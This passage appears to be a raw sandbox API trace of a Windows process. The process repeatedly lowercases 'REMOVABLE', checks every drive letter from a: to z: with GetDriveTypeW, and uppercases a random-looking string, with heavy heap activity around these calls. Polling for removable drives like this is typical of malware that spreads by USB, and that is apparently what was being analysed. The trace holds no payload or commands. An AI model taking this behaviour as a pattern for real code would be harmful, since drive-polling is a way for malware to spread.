lpMsg=0x7dfb8c) returned 0 [0214.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0214.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0214.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.814] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0214.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0214.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0214.814] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0214.814] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.814] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.815] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.815] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.815] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.815] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.815] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.815] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.815] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.816] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.816] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.816] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.816] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.816] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.817] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.817] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.868] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.868] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.868] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.869] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.869] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.869] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.869] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.869] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.869] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.870] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.870] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.870] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0214.870] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.870] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.870] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.870] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.870] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0214.870] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.870] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.870] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0214.870] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0214.871] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.871] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.871] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0214.871] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0214.871] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0214.871] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0214.871] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0214.871] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.871] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0214.871] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.871] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0214.871] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326020 [0214.871] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326020 | out: hHeap=0x12c0000) returned 1 [0214.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0214.872] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0214.872] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0214.872] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0214.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.872] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.872] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0214.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.872] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.872] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0214.872] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.872] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.872] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.873] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0214.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0214.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.873] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0214.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0214.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.873] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0214.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0214.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0214.873] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.873] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.873] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.873] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.873] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.873] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.874] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.874] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.874] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.874] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.874] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.874] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.875] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.875] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.875] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.875] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.875] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.875] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.875] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.876] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.876] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.876] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.876] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.876] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.876] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.877] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.877] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.877] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.877] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.877] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0214.877] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.877] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.877] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.877] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.877] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0214.877] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.877] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0214.877] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.877] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.877] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.877] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.877] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0214.877] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0214.877] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0214.877] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260e0 [0214.877] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.877] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.877] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.878] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.878] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260e0 | out: hHeap=0x12c0000) returned 1 [0214.878] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.878] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0214.878] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0214.878] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.878] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0214.878] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.878] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.878] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.878] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0214.878] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.878] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.878] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.878] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0214.878] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0214.878] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.878] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.878] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0214.878] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.878] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.878] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0214.878] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.878] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.878] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.879] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0214.879] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0214.879] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.879] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.879] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0214.879] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.879] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.879] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0214.879] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.879] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0214.879] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.879] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.879] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0214.879] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0214.879] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0214.879] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.879] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.879] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.879] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.879] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.880] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.880] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.880] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.880] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.880] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.880] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.881] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.881] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.881] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.881] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.882] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.882] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.882] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.882] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.882] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.882] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.882] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.883] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.883] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.883] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.883] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.883] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.883] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0214.883] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0214.883] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.884] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.884] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.884] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0214.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0214.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0214.884] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.884] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0214.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0214.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f20 [0214.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.884] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.884] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.884] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f20 | out: hHeap=0x12c0000) returned 1 [0214.884] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0214.884] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0214.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e280 [0214.884] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.884] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e280 | out: hHeap=0x12c0000) returned 1 [0214.884] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.884] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.884] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.884] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0214.885] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.885] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.885] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.885] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0214.885] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.885] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.885] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.885] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0214.885] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0214.885] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.885] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0214.885] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0214.885] CharUpperBuffW (in: 